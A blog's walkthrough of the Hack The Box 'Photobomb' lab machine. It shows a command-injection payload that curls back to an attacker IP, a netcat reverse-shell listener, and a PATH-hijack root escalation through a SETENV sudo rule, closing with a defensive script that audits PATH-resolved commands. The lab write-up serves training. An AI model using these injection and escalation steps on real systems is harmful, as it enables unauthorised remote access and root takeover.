Akshay's Blog

# Photobomb Writeup

Hack The Box Photobomb Writeup

## Add the domain to the hosts file

Photobomb uses the domain name photobomb.htb. Edit the hosts file:

```shell
sudo vi /etc/hosts
```

and add:

```
10.10.11.182  photobomb.htb
```

Visiting the site shows a login page at http://photobomb.htb/printer.

When reading the page source I found a photobomb.js file.

Surprisingly, the photobomb.js file contains the login details for the site.

## Login

I logged in using the URL http://pH0t0:b0Mb!@photobomb.htb/printer

Capturing the request with Burp Suite shows the parameters sent to the server. I checked all of them for command injection and found that filetype is vulnerable.

To verify this I used curl to send a request back to my Linux machine.

1. Start a Python web server on the attacking machine.

2. Send the request in Burp with the payload:

```
filetype=jpg;curl -XGET 10.10.14.105:8000
```

3. A request arrived at my machine.

So the command injection is confirmed and we need to get a reverse shell now.

## Reverse Shell

1. Start a listener:

```shell
sudo netcat -lvnp 9001
```

2. Create a payload and URL-encode it. I used revshells.com to create a Python reverse shell.

3. Got a reverse shell.

## User Flag

The reverse shell runs as the wizard user, which gives access to the user flag.

## Root Flag

For the root flag we need to escalate privileges.

1. Check the sudo rights of the user:

```
$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
```
2. Read the /opt/cleanup.sh file:

```shell
$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```
3. The sudoers entry carries SETENV, so we can pass environment variables such as PATH through sudo, and the script calls find by its bare name rather than an absolute path. Under sudo our own find will therefore run as root. Create a file named find that contains bash and make it executable:

```shell
$ echo bash > find
$ chmod +x find
```

4. Now run the script with our directory prepended to PATH and get root:

```
$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# ls
1  find  log  photobomb.sh  public  resized_images  server.rb  source_images
root@photobomb:/home/wizard/photobomb# cd /
root@photobomb:/# ls
bin   dev  home  lib32  libx32      media  opt   root  sbin  sys  usr
boot  etc  lib   lib64  lost+found  mnt    proc  run   srv   tmp  var
root@photobomb:/# cd root
root@photobomb:~# ls
root.txt
root@photobomb:~# cat root.txt
8380325b1ea2d19343bb97b83ab03359
root@photobomb:~#
```
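As an added example that is not part of the writeup, the shell audit below lists the command names a script resolves through PATH, which is what makes cleanup.sh exploitable under a SETENV sudo rule; it runs against a constructed copy of the script shown above and against a hardened copy that uses absolute paths. The function name bare_commands and the hardened rewrite are my own assumptions, not anything from the box.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): list the command names a script
# resolves through PATH. Under a sudo rule with SETENV the caller controls PATH,
# so each listed name can be shadowed, as done above with find. Built-ins and
# anything containing a slash are skipped because PATH lookup does not apply.
# The parser is approximate (no quoting awareness) but handles cleanup.sh.

bare_commands() {
    sed -e 's/#.*$//' -e 's/[;|&]/ & /g' "$1" | awk '
    BEGIN {
        n = split("; & | then do else ! -exec -execdir {", s, " ");  for (i = 1; i <= n; i++) sep[s[i]] = 1
        n = split("cd . [ echo export set unset exit return fi done esac", b, " "); for (i = 1; i <= n; i++) builtin[b[i]] = 1
        n = split("if while until elif", k, " ");                   for (i = 1; i <= n; i++) kw[k[i]] = 1
    }
    {
        cmdpos = 1                      # a new line always starts a command
        for (i = 1; i <= NF; i++) {
            w = $i
            if (w in sep) { cmdpos = 1; continue }        # next word is a command again
            if (!cmdpos) continue                         # arguments are not looked up
            if (w ~ /^[A-Za-z_][A-Za-z0-9_]*=/) continue  # VAR=value prefix
            if (w in kw) continue                         # "if cmd": cmd is next
            cmdpos = 0
            if (w in builtin || w ~ /\//) continue        # built-in or explicit path
            print w
        }
    }' | sort -u
}

# Constructed copy of /opt/cleanup.sh from the box, and a hardened variant
# (assumed fix) in which every PATH-resolved command gets its absolute path.
VULN=$(mktemp); FIXED=$(mktemp)
cat > "$VULN" <<'EOF'
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
EOF
sed -e 's#^find #/usr/bin/find #' -e 's#-exec chown #-exec /bin/chown #' "$VULN" > "$FIXED"

echo "PATH-resolved commands in the original:"; bare_commands "$VULN"        # chown, find
echo "PATH-resolved commands in the hardened copy:"; bare_commands "$FIXED"  # (none)
```

On the defender's side the hardened script is only half the fix; dropping SETENV from the sudoers entry stops the caller from altering PATH at all.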